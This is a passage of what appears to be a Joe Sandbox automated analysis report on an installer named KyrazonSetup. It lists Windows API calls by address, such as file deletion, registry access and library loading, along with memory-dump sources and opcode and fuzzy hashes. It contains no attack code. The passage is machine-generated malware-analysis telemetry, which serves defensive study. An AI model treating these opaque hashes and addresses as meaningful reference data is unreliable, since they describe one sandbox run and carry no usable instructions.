                                                                                        • Part of subcall function 004062A3: FindFirstFileA.KERNELBASE(74DF3410,004480C0,C:\,00405A69,C:\,C:\,00000000,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000), ref: 004062AE
                                                                                        • Part of subcall function 004062A3: FindClose.KERNELBASE(00000000), ref: 004062BA
                                                                                      • lstrlenA.KERNEL32 ref: 0040228B
                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00402295
                                                                                      • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022BD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                      • String ID:
                                                                                      • API String ID: 1486964399-0
                                                                                      • Opcode ID: 01c39747f4571799e565524aea2ea4f99065a1f4da79d757333e85a17dd115f4
                                                                                      • Instruction ID: 349dabc4e121e40637a2e3f52c057a668796bcb7f348320b075967da111ca0c3
                                                                                      • Opcode Fuzzy Hash: 01c39747f4571799e565524aea2ea4f99065a1f4da79d757333e85a17dd115f4
                                                                                      • Instruction Fuzzy Hash: C8117071A04345AACB10EFF98A4999EBBB8EF05308F14443FA000F72C1D6BCC5408B69
                                                                                      APIs
                                                                                        • Part of subcall function 00405B14: GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
                                                                                        • Part of subcall function 00405B14: SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B2D
                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,?,00000000,0040590F), ref: 0040573B
                                                                                      • DeleteFileA.KERNELBASE(?,?,?,00000000,0040590F), ref: 00405743
                                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040575B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                      • String ID:
                                                                                      • API String ID: 1655745494-0
                                                                                      • Opcode ID: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
                                                                                      • Instruction ID: 41a59d98901dadf9faebb98bb098dbd3bab940c68288cb1340f4b8977cea5a50
                                                                                      • Opcode Fuzzy Hash: 4390be6e2ef8d2df5986f304b1f187f42b365e072cd754739d21517cc83f2d57
                                                                                      • Instruction Fuzzy Hash: FCE0E531115A9197C61177308E0CA5B2AD8DFC6324F09493AF492B31C0C778444ADA6E
                                                                                      APIs
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(?,?,C:\,?,00405A3D,C:\,C:\,74DF3410,?,00485000,00405788,?,74DF3410,00485000,00000000), ref: 004059DF
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059E4
                                                                                        • Part of subcall function 004059D1: CharNextA.USER32(00000000), ref: 004059F8
                                                                                      • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                        • Part of subcall function 0040558D: CreateDirectoryA.KERNELBASE(?,?,00485000), ref: 004055D0
                                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,0047F000,00000000,00000000,000000F0), ref: 0040163C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID:
                                                                                      • API String ID: 1892508949-0
                                                                                      • Opcode ID: 063cade49b44451d63862b0b4acccae64b1b18f7fe3bcddbb7de98dadaaffedf
                                                                                      • Instruction ID: 4061ca9d70ae00be9bb4ad17465cac8f9754b7470a883fc3f2c2ead3154265c3
                                                                                      • Opcode Fuzzy Hash: 063cade49b44451d63862b0b4acccae64b1b18f7fe3bcddbb7de98dadaaffedf
                                                                                      • Instruction Fuzzy Hash: F0112731608152EBCF217BB54D419BF66B0DA92324B28093FE5D1B22E3D63D49429A3F
                                                                                      APIs
                                                                                      • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 004024A3
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp,00000000,00000011,00000002), ref: 00402542
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseQueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3356406503-0
                                                                                      • Opcode ID: 54b3be57d36ca7f0d44e05a6551a7de4bb5a3a832c5f241bf52507b427e6b0ed
                                                                                      • Instruction ID: 77493b7c1caf9c0e8479f6492169629c84c06238e2a5328c90670a3d76b39679
                                                                                      • Opcode Fuzzy Hash: 54b3be57d36ca7f0d44e05a6551a7de4bb5a3a832c5f241bf52507b427e6b0ed
                                                                                      • Instruction Fuzzy Hash: BB11A371A01205FFDB15CF64DA9C9AEBBB49F11348F20843FE445B72C0D6B88A85DB69
                                                                                      APIs
                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                      • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 441e51a43d6905f91ce896fdb50f7f3e8ce2eecf8d4abbdd503ecf7d62571e05
                                                                                      • Instruction ID: 4cce14bbfac51e86deb9fb7f4f48f49e8063224b6fb315ffcb1e2fade37cb0f9
                                                                                      • Opcode Fuzzy Hash: 441e51a43d6905f91ce896fdb50f7f3e8ce2eecf8d4abbdd503ecf7d62571e05
                                                                                      • Instruction Fuzzy Hash: 1201FF316242209BE70A4B399D04B6A36D8F711729F10823FF851F72F1EA78CC028B4C
                                                                                      APIs
                                                                                      • OleInitialize.OLE32(00000000), ref: 004051A9
                                                                                        • Part of subcall function 0040408B: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D
                                                                                      • OleUninitialize.OLE32(00000404,00000000), ref: 004051F5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InitializeMessageSendUninitialize
                                                                                      • String ID:
                                                                                      • API String ID: 2896919175-0
                                                                                      • Opcode ID: a528ede16d8ece0c59ab40356331991896dac7d538e320d0ffb06345b870f253
                                                                                      • Instruction ID: d3bc7387fd57afad1243513bcccd471715f644c2d298f0249ad8164e4477d673
                                                                                      • Opcode Fuzzy Hash: a528ede16d8ece0c59ab40356331991896dac7d538e320d0ffb06345b870f253
                                                                                      • Instruction Fuzzy Hash: 43F0F073800B00ABE6005750DE00B1777A0DB82316F09443FFE84772E2CBB588018A6D
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 00401E49
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401E54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 08e1dd53f9dcbc9cf0071cf2efe72e77efb5ce36218b7302fcb677c7ad8d5d63
                                                                                      • Instruction ID: 3bb07fcd417830823528c6a07ea034e2eb3a780eb411924ff220aca0ca1a0825
                                                                                      • Opcode Fuzzy Hash: 08e1dd53f9dcbc9cf0071cf2efe72e77efb5ce36218b7302fcb677c7ad8d5d63
                                                                                      • Instruction Fuzzy Hash: 85E0ED72B04212AFDB14ABA5AA495AEB6A4DF40329B10443BE411B11D1DA7849419F5D
                                                                                      APIs
                                                                                      • GetModuleHandleA.KERNEL32(?,?,?,0040327F,0000000A), ref: 0040634A
                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00406365
                                                                                        • Part of subcall function 004062CA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
                                                                                        • Part of subcall function 004062CA: wsprintfA.USER32 ref: 0040631A
                                                                                        • Part of subcall function 004062CA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040632E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2547128583-0
                                                                                      • Opcode ID: 30985bc18176bda4dfc46ca2d396654736e9499ca8d22b71f2c1527f66d3312f
                                                                                      • Instruction ID: b6ec051a43833f1e75efb6c097fb1b7945085d0745a1c08503facd7b36b6f755
                                                                                      • Opcode Fuzzy Hash: 30985bc18176bda4dfc46ca2d396654736e9499ca8d22b71f2c1527f66d3312f
                                                                                      • Instruction Fuzzy Hash: 88E08C32604210ABD2106A709E0493B63A9AF88710306483EFA46F2240DB389C3696AD
                                                                                      APIs
                                                                                      • FreeLibrary.KERNELBASE(?,74DF3410,00000000,00485000,00403711,0040352B,?,?,00000006,00000008,0000000A), ref: 00403753
                                                                                      • GlobalFree.KERNEL32(?), ref: 0040375A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID:
                                                                                      • API String ID: 1100898210-0
                                                                                      • Opcode ID: 7e46f2bbc1df1a916a08afdb92386b58c2c0976bbab61f5249e3d24e3d7a9f09
                                                                                      • Instruction ID: 6ba71519c43bf55b4b9167d4a70dfa8993af453660be5c9224fc6eec323f1fd3
                                                                                      • Opcode Fuzzy Hash: 7e46f2bbc1df1a916a08afdb92386b58c2c0976bbab61f5249e3d24e3d7a9f09
                                                                                      • Instruction Fuzzy Hash: FDE0127350212097C6216F59EE4875E7B786F85F22F05507AEA407B2608774AC428BD8
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402DA3,00489000,80000000,00000003), ref: 00405B3D
                                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B5F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                                      • Instruction ID: 6905ba7dec075751c4c8bdaf1e97cd52a4ed4154a0977e2bcfee25d1bc4df630
                                                                                      • Opcode Fuzzy Hash: 80243517f436f95d2d00e5b5224d95f101b34955670c918b0becce4e09b30ec3
                                                                                      • Instruction Fuzzy Hash: F5D09E31254201EFEF098F20DE16F2EBBA2EB94B00F11952CB682944E1DA715819AB19
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(?,?,0040572C,?,?,00000000,0040590F,?,?,?,?), ref: 00405B19
                                                                                      • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405B2D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                                                      • Instruction ID: a6801623bae5b64e590af13d118403295127a001a29879099f28d41f07625d68
                                                                                      • Opcode Fuzzy Hash: d21186c4df97c8b90cedd4d9d2ae0fe59d501b3437fd2b8c2b63dc03c6f7d79a
                                                                                      • Instruction Fuzzy Hash: A4D0C972504121ABC2102728AE0889BBB65DB54271702CA36F8A9A26B1DB304C569A98
                                                                                      APIs
                                                                                      • CloseHandle.KERNEL32(FFFFFFFF,0040352B,?,?,00000006,00000008,0000000A), ref: 004036FF
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\, xrefs: 00403713
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseHandle
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\
                                                                                      • API String ID: 2962429428-67779189
                                                                                      • Opcode ID: e2fce6cb7e4bd878bb855d9d4782e23046200841727912eee4ccc09af04f40ce
                                                                                      • Instruction ID: 8a34961e980c079ac6948eddad59adcae2d4cd7e0cdc6fd5433603b066ad1ffd
                                                                                      • Opcode Fuzzy Hash: e2fce6cb7e4bd878bb855d9d4782e23046200841727912eee4ccc09af04f40ce
                                                                                      • Instruction Fuzzy Hash: 36C012B050470096C5607F749E8F6093E556B41735B744735F0B8B60F1C77C8659955E
                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,004031FF,00485000,00485000,00485000,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00405610
                                                                                      • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040561E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectoryErrorLast
                                                                                      • String ID:
                                                                                      • API String ID: 1375471231-0
                                                                                      • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                                      • Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
                                                                                      • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                                                                                      • Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E
                                                                                      APIs
                                                                                      • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E7D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Create
                                                                                      • String ID:
                                                                                      • API String ID: 2289755597-0
                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                      • Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74
                                                                                      APIs
                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,0041E028,000000FF,0041E028,000000FF,000000FF,00000004,00000000), ref: 00405BF4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FileWrite
                                                                                      • String ID:
                                                                                      • API String ID: 3934441357-0
                                                                                      • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                      • Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
                                                                                      • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                                                                                      • Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                                      • Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
                                                                                      • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                                                                                      • Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EB4,?,?,?,?,00000002,Remove folder: ), ref: 00405E4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
                                                                                      • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                      • Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58
                                                                                      APIs
                                                                                      • SetDlgItemTextA.USER32(?,?,00000000), ref: 00404059
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ItemText
                                                                                      • String ID:
                                                                                      • API String ID: 3367045223-0
                                                                                      • Opcode ID: a0a78e1bf6a6b29a50df979bec23ba929f6ba3d1fc8fcf0d14566fab2b8853c2
                                                                                      • Instruction ID: bf62610f610bba90556bdcd31abde1078def355814f7361e89583e93c2f26f86
                                                                                      • Opcode Fuzzy Hash: a0a78e1bf6a6b29a50df979bec23ba929f6ba3d1fc8fcf0d14566fab2b8853c2
                                                                                      • Instruction Fuzzy Hash: C2C04C79148700BFD641A755CD42F1FB7EDEF94315F40C92EB19CA11D1C63988209A26
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,00000000,00000000,00000000), ref: 0040409D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: fcb410e73ff28c7c721615f2d1b76ecbcc08593dfa481273694f1ab80d680dea
                                                                                      • Instruction ID: dc0fe9f2873b1b31caed9ffec69b67f1cbb85c05ef5e40ff43161b5d97c3bfec
                                                                                      • Opcode Fuzzy Hash: fcb410e73ff28c7c721615f2d1b76ecbcc08593dfa481273694f1ab80d680dea
                                                                                      • Instruction Fuzzy Hash: B2C04C756407006AEA218B51DD49F0677946750B40F1484397750F60D4C674E410DA1C
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404A5C
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404A67
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404AB1
                                                                                      • LoadBitmapA.USER32(0000006E), ref: 00404AC4
                                                                                      • SetWindowLongA.USER32(?,000000FC,0040503B), ref: 00404ADD
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404AF1
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404B03
                                                                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404B19
                                                                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404B25
                                                                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B37
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404B3A
                                                                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B65
                                                                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B71
                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C06
                                                                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404C31
                                                                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C45
                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404C74
                                                                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C82
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404C93
                                                                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D90
                                                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DF5
                                                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404E0A
                                                                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404E2E
                                                                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E4E
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404E63
                                                                                      • GlobalFree.KERNEL32(?), ref: 00404E73
                                                                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EEC
                                                                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404F95
                                                                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404FA4
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404FC4
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00405012
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 0040501D
                                                                                      • ShowWindow.USER32(00000000), ref: 00405024
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404520
                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 0040454A
                                                                                      • SHBrowseForFolderA.SHELL32(?,00436048,?), ref: 004045FB
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404606
                                                                                      • lstrcmpiA.KERNEL32(Remove folder: ,0043C070), ref: 00404638
                                                                                      • lstrcatA.KERNEL32(?,Remove folder: ), ref: 00404644
                                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404656
                                                                                        • Part of subcall function 004056A0: GetDlgItemTextA.USER32(?,?,00002000,0040468D), ref: 004056B3
                                                                                        • Part of subcall function 0040620A: CharNextA.USER32(?,*?|<>/":,00000000,0047B000,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406262
                                                                                        • Part of subcall function 0040620A: CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
                                                                                        • Part of subcall function 0040620A: CharNextA.USER32(?,0047B000,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406274
                                                                                        • Part of subcall function 0040620A: CharPrevA.USER32(?,?,74DF3410,00485000,00000000,004031E7,00485000,00485000,0040341E,?,00000006,00000008,0000000A), ref: 00406284
                                                                                      • GetDiskFreeSpaceA.KERNEL32(00434040,?,?,0000040F,?,00434040,00434040,?,00000001,00434040,?,?,000003FB,?), ref: 00404714
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040472F
                                                                                        • Part of subcall function 00404888: lstrlenA.KERNEL32(0043C070,0043C070,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
                                                                                        • Part of subcall function 00404888: wsprintfA.USER32 ref: 0040492E
                                                                                        • Part of subcall function 00404888: SetDlgItemTextA.USER32(?,0043C070), ref: 00404941
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_KyrazonSetup.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: @@C$A$Remove folder:
                                                                                      • API String ID: 2624150263-2183615021
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(0040851C,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402153
                                                                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00002000,?,00000001,0040850C,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402202
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1919676561.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1919657953.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919695188.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1919722258.0000000000438000.00000004.00000001.01000000.00000003.sdmp
